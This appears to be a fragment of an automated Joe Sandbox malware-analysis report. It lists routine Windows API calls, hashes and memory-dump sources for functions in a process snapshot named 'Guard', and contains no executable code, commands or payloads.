                                                                      • Opcode ID: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
                                                                      • Instruction ID: edcbd3056a7c76880a65ea1b4587c03b28a7317d4057f6e93c5529b05b83f6e1
                                                                      • Opcode Fuzzy Hash: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
                                                                      • Instruction Fuzzy Hash: 96017CB5600502ABC315EB28C451E2AF7AAFF8A350714815EF919C7702DB31AC21CBE4
                                                                      APIs
                                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00724998
                                                                      Similarity
                                                                      • API ID: EnvironmentVariable
                                                                      • String ID:
                                                                      • API String ID: 1431749950-0
                                                                      • Opcode ID: 0f9d7b4e2a99f4261c80f69b04d8e2f66bb6f7cc34237bee8c4bcfdd4782a63d
                                                                      • Instruction ID: d1d8d088ffb14d5fb6c7832b4eb869833a723d14446b7338504eaa31276471ac
                                                                      • Opcode Fuzzy Hash: 0f9d7b4e2a99f4261c80f69b04d8e2f66bb6f7cc34237bee8c4bcfdd4782a63d
                                                                      • Instruction Fuzzy Hash: C1F03135608104BF9B54FB65D84ADAF77BDEF45320B00405AF9099B391DE74BD81C754
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _fseek
                                                                      • String ID:
                                                                      • API String ID: 2937370855-0
                                                                      • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                      • Instruction ID: cab3cfcab93185549ca04165c3a7795feab01a3eeffc03f50eff15d74ec9bc80
                                                                      • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                      • Instruction Fuzzy Hash: FDF085B6800208FFDF108F94DC00DEBBBBAEF89720F04419CF9045A210D232EA218BA0
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,?,006C27AF,?,00000001), ref: 006C4A63
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: f49cfb3c198d30568ab7372574cd5999b9264cb8ae13c80a5ec9c4ec73f8e81c
                                                                      • Instruction ID: 7fa5c8709cbde4ba4155f8b5567d38eab34a1a847ad1bd30883eebb0a3eb4c3b
                                                                      • Opcode Fuzzy Hash: f49cfb3c198d30568ab7372574cd5999b9264cb8ae13c80a5ec9c4ec73f8e81c
                                                                      • Instruction Fuzzy Hash: A9F0F271145701CFCB34DFA4E4A0A6ABBF2EB14365320A92EE5A682614CB319984DB48
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock
                                                                      • String ID:
                                                                      • API String ID: 2638373210-0
                                                                      • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                      • Instruction ID: 97aaf00d3af9f7d7a0f78079d3b962eb509982cf354c8922a31432add288d1be
                                                                      • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                      • Instruction Fuzzy Hash: 1EF0F87240020DFFDF05CF94C941EAABB79FB14314F208589FD198A252D776EA21AB91
                                                                      APIs
                                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 006D09E4
                                                                        • Part of subcall function 006C1821: _memmove.LIBCMT ref: 006C185B
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_memmove
                                                                      • String ID:
                                                                      • API String ID: 2514874351-0
                                                                      • Opcode ID: 1c53bb552cdb87e0ac276cc0f39a4578f5c81416d10a7d9ba9c7d46b373e3925
                                                                      • Instruction ID: e34adf5712280d70bcf86dd3aa634f9741c8937791f2f5151ba2ad7e9464cb5b
                                                                      • Opcode Fuzzy Hash: 1c53bb552cdb87e0ac276cc0f39a4578f5c81416d10a7d9ba9c7d46b373e3925
                                                                      • Instruction Fuzzy Hash: 01E0263290022817C72096989C05FEE77DDDB8A690F0002BBFC08C7204D9709C8086D4
                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00714D31
                                                                        • Part of subcall function 006C1821: _memmove.LIBCMT ref: 006C185B
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FolderPath_memmove
                                                                      • String ID:
                                                                      • API String ID: 3334745507-0
                                                                      • Opcode ID: eeef1403da83ad6f1d79cd1ac4c04c7386fc092742893d48e0514f96dc8482aa
                                                                      • Instruction ID: 98cf3424c59a64e884280e8d5008a571a9e1bcc6eeb35100997e4f379471b942
                                                                      • Opcode Fuzzy Hash: eeef1403da83ad6f1d79cd1ac4c04c7386fc092742893d48e0514f96dc8482aa
                                                                      • Instruction Fuzzy Hash: A6D05EA590032C2BDB60E6A89C0DDB77BACD746220F0006A67D5CC3102E9349D4586E0
                                                                      APIs
                                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,007006E6,00000000,00000000,00000000), ref: 006C42BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 99ac126eac46116cfc2ada0b9d5011289c00c3a613d8c0f3bd171386995952ae
                                                                      • Instruction ID: 97f97f505636e98e886e3bb6a5a294a61842905081a8d132efd55e0f7a2eb066
                                                                      • Opcode Fuzzy Hash: 99ac126eac46116cfc2ada0b9d5011289c00c3a613d8c0f3bd171386995952ae
                                                                      • Instruction Fuzzy Hash: 09D0C77464020CBFE710CB80DC46FAD777CEB05710F100195FE0466290D6B27D508795
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00713BFE), ref: 00714FED
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: d6379b3aae48cdef15e42a1e4286a8438b62934217e9905d06f2eaa13497485e
                                                                      • Instruction ID: 96ced9b9ca579b7efb9beae485fc99de00410186b276defb7068873be00e3371
                                                                      • Opcode Fuzzy Hash: d6379b3aae48cdef15e42a1e4286a8438b62934217e9905d06f2eaa13497485e
                                                                      • Instruction Fuzzy Hash: 47B092390006005A9E281E3C19680DD338958433A97DC1B82E978856E1933D888BA5A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 5da979c6922813ebe62287e8d060465626b4516d62a451c89081a66bdc4e2601
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 7531B771E001099BE718DF59C480AA9F7A6FF99300F648AA6E409CB352E731EDC1CBC0
                                                                      APIs
                                                                        • Part of subcall function 00714005: FindFirstFileW.KERNEL32(?,?), ref: 0071407C
                                                                        • Part of subcall function 00714005: DeleteFileW.KERNEL32(?,?,?,?), ref: 007140CC
                                                                        • Part of subcall function 00714005: FindNextFileW.KERNEL32(00000000,00000010), ref: 007140DD
                                                                        • Part of subcall function 00714005: FindClose.KERNEL32(00000000), ref: 007140F4
                                                                      • GetLastError.KERNEL32 ref: 0071C292
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                      • String ID:
                                                                      • API String ID: 2191629493-0
                                                                      • Opcode ID: b87f12bd396d59c22a34cb1c5369dd3d75a0bf55e0dbccd3c2a16507e708a4e0
                                                                      • Instruction ID: a9c420b8212283f0f8941d10aa170770d85be55381954f6f1ca09cf7c6ab481b
                                                                      • Opcode Fuzzy Hash: b87f12bd396d59c22a34cb1c5369dd3d75a0bf55e0dbccd3c2a16507e708a4e0
                                                                      • Instruction Fuzzy Hash: D0F082312101108FCB10EF59D844FA9B7E6AF48720F05845DF94587352CB74BC41CB98
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(?,?,00000000,006F2F8B), ref: 006C42EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 43504513b66758d147a7d4c6784c658e5493abd830c5ae47b850f1c018e3b772
                                                                      • Instruction ID: 3b8597ce1d8601116e822dc05fc78b0577031c3dac752fb9ece025b8cc0e5d45
                                                                      • Opcode Fuzzy Hash: 43504513b66758d147a7d4c6784c658e5493abd830c5ae47b850f1c018e3b772
                                                                      • Instruction Fuzzy Hash: 1AE09279400B01CFC3318F1AE815862FBE5FFE13613214A2EE4E692660D7B4599ADB90